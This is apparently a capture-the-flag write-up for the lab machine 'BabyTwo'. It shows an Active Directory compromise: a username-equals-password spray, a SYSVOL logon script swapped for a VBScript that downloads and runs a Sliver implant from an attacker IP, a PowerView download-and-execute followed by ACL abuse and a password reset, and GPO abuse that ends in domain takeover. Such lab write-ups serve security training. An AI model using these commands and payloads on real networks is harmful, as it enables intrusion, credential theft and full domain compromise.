Syk0

Babytwo

BabyTwo

Initial machine information

The User flag for this Box is located in a non-standard directory, C:\.

Overview

BabyTwo demonstrates a SYSVOL script replacement attack chained with ACL abuse to escalate through AD to domain admin via GPO execution. Initial credentials come from a username-equals-password spray, and SYSVOL write access allows injecting a malicious login script that provides a foothold. ACL analysis then reveals a path to GPOADM, enabling full domain compromise via pyGPOAbuse.

Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.234.72 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.234.72

Standard Windows DC ports: SMB (445), Kerberos (88), LDAP (389/636), DNS (53), RDP (3389). Add dc.baby2.vl and baby2.vl to /etc/hosts.

SMB - Guest Access

nxc smb 10.129.234.72 -u '' -p '' --shares

Guest access is available. The homes share contains a listing of user home directories, exposing a username list - no useful file contents, but valuable for AD enumeration.

User Validation with Kerbrute

Extract usernames from the share listing and validate them against the DC:

kerbrute userenum --dc dc.baby2.vl -d baby2.vl users

Password Spray - User = Password

A common misconfiguration on new accounts is setting the password to match the username. Test this across all confirmed users with --no-bruteforce (one attempt per user) to avoid lockouts:

nxc smb baby2.vl -u users -p users --no-bruteforce --continue-on-success

Hit: Carl.Moore:Carl.Moore

BloodHound Collection

With valid credentials, run a BloodHound collector to map the AD environment:

bloodhound-ce-python -c all -u Carl.Moore -p 'Carl.Moore' -d baby2.vl -dc dc.baby2.vl --dns-tcp -ns 10.129.234.72

SYSVOL - LNK File Analysis

While enumerating SMB shares, a .lnk file (login.vbs.lnk) is found. Use lnkinfo (from the liblnk-utils package) to parse it:

lnkinfo login.vbs.lnk > info

The LNK points to login.vbs on the SYSVOL share - a logon script that runs for domain users. Read it directly (SYSVOL is world-readable):

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")
 
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
 
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
 
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
 
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
 
    Set objNetwork = Nothing
End Sub
 
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Critically, we have write access to SYSVOL with our credentials - meaning we can replace this script with a malicious one that runs as any domain user who logs in.

Foothold

SYSVOL Script Replacement

Replace login.vbs with a malicious VBScript that downloads and executes a Sliver implant:

Sub MapNetworkShare()
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell (New-Object System.Net.WebClient).DownloadFile('http://10.10.15.150/ag.exe', 'C:\\Windows\\Temp\\ag.exe')"
    objShell.Run "C:\\Windows\\Temp\\ag.exe"
End Sub
 
MapNetworkShare

Host ag.exe (a Sliver HTTP beacon) on a Python HTTP server. Upload the modified script to SYSVOL, overwriting the original. When any domain user logs in, the script executes and calls back to our listener.

We receive a Sliver beacon from a domain user session.

Lateral Movement

ACL Abuse - WriteOwner/WriteDACL on GPOADM

BloodHound analysis reveals that Amelia.Griffiths is a member of the [email protected] group, which has WriteOwner and WriteDACL over [email protected].

This means Amelia can take ownership of GPOADM and grant herself full control over the account, allowing a password reset. Transfer PowerView to the machine and abuse the ACL:

IWR http://10.10.15.150/PowerView.ps1 | IEX
 
# Grant Amelia full rights over GPOADM
Add-DomainObjectAcl -TargetIdentity gpoadm -Rights All -principalidentity Amelia.Griffiths
 
# Reset GPOADM's password
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword GPOADM -AccountPassword $UserPassword

Privilege Escalation

GPO Abuse with pyGPOAbuse

GPOADM has rights to modify Group Policy Objects. Use pyGPOAbuse to add a scheduled task to the Default Domain Policy (GPO ID: 31B2F340-016D-11D2-945F-00C04FB984F9) that executes our implant:

python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' \
  -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 \
  -command 'C:\\Windows\\Temp\\ag.exe'

The GPO won't apply immediately - we need to force an update. From the Amelia session:

gpupdate

This triggers GPO application on the DC. The scheduled task fires and we receive a new Sliver beacon running as DC$ (the domain controller machine account):

The DC machine account has DCSync rights, giving us full domain compromise.

Attack Chain Summary

PhaseTechniqueResult
ReconSMB guest + username enumerationUser list from homes share
Credential accessUser = Password sprayCarl.Moore:Carl.Moore
DiscoverySYSVOL LNK + script analysisWrite access to login script
FootholdSYSVOL script replacement → Sliver beaconShell as Amelia.Griffiths
Lateral movementWriteOwner/WriteDACL ACL abuse → PowerViewGPOADM password reset
PrivescpyGPOAbuse + gpupdateBeacon as DC$